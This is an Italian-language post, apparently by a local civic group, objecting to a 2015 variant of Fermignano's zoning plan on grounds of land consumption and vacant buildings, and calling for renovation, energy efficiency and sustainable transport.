[](/images/2015/05/osservazioni.jpg)Potremmo continuare a scrivere fiumi di parole per descrivervi questa Variante demolitrice, ma ci siamo prefissi di essere brevi (**[qui trovate il documento integrale delle Osservazioni da noi presentate](/images/2015/05/Osservazioni-Variante-PRG.pdf)**).
Un ultima cosa però vogliamo dirvela: è che ci è venuto il dubbio che questa variante tradisca addirittura la reale funzione che ha un PRG.
Il Piano Regolatore Generale (PRG) è uno strumento che regolamenta la trasformazione del territorio comunale e quindi l'attività edilizia che in esso si può compiere con il fine di progettare l'espansione e lo sviluppo di un area urbana i maniera coerente, sensata e strutturata.
La coerenza e la progettualità però non sono molto visibili in questa Variante, o per lo meno noi non riusciamo a vederla. Ci sembra piuttosto che l'unico progetto sia quello di una monetizzazione indiscriminata del suolo: cercare di gonfiare le casse comunali con le tasse sui terreni edificabili e opere di urbanizzazione.
Potrebbe anche essere solo una nostra allucinazione, dal momento che **pare impossibile che un'amministrazione seria e lungimirante, consapevole del fatto che un suolo cementificato impiega quasi 5 secoli per rigenerarsi e tornare ad essere sfruttabile in agricoltura, possa operare una politica simile**. Tuttavia, non si riesce ad intravedere una motivazione ad una scelta simile in coerenza con la natura di un Piano Regolatore Generale.
Il compito del PRG è quello di prevedere lo sviluppo di una popolazione, di un territorio e il suo sviluppo economico, ed in base a questi parametri dettare le linee guida per gli interventi che in esso si possono realizzare, sia dall'amministrazione per la collettività (opere pubbliche), che da parte del privato cittadino (edilizia privata).
Sotto questo aspetto la nuova Variante lascia sconcertati: **in presenza di così tanti edifici (residenziali, produttivi e commerciali) vuoti, perché rimasti sfitti e invenduti**, non si capisce quali previsioni di sviluppo economico e demografico abbia fatto l'amministrazione per prevedere l'inserimento di così tante nuove edificabilità. Ci aspettiamo un'invasione?
Visto il dilagare inesorabile del consumo di suolo negli ultimi decenni a Fermignano, **una svolta ambientalista è necessaria**.
Ma la vera svolta ambientalista si fa in altro modo: si deve riqualificare e sfruttare tutto l'esistente. Rendere prioritari la ristrutturazione e il recupero di vecchi edifici. Incentivare gli interventi che migliorino l'efficienza energetica dei vecchi edifici anche tramite sconti sulle tassazioni comunali. Incentivare la produzione di energia da fonti rinnovabili, l'accessibilità ciclabile e l'uso dei servizi di trasporto pubblico.
| 100.093333 | 855 | 0.812442 | ita_Latn | 0.999713 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.